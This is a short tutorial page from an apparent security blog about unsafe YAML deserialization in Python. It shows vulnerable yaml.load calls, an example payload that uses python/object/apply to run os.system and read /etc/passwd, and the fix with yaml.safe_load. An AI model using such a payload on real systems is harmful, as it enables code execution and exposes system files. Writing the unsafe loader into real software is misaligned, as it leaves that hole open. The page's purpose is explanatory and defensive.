Blog
Search…
Blog
Welcome to egonzalez blog
Hacking
Index
Hack the box writeups
Python Vulnerabilities
Data Deserialization
Pickle
XML
YAML
Hacking cheatsheet
OpenStack
Index
Docker and DevOps
Index
Powered By
GitBook
YAML
Exploitation
The example below is a vulnerable YAML code that can be exploited.
Python 2
import yaml
# Input can be whater text or a file with this content
yaml.load(input)
Python 3
In Python 3, the default loader changed to a safe Loader, and to exploit this vulnerability should be enable UnsafeLoader explicitly.
import yaml
# Input can be whater text or a file with this content
yaml.load(input, Loader=yaml.UnsafeLoader)
Example payload to exploit this vulnerability in a file sample.yaml os a direct input if allowed.
!!python/object/apply:os.system ["cat /etc/passwd"]
Fix
Fixing this vulnerability is relatively easy.
Replace the usage of
yaml.load()
function with
yaml.safe_load()
In Python 3,
yaml.load()
uses as default data Loader
FullLoader
which avoids code execution.
Previous
XML
Next
Hacking cheatsheet
Last modified
2yr ago
Copy link
Outline
Exploitation
Fix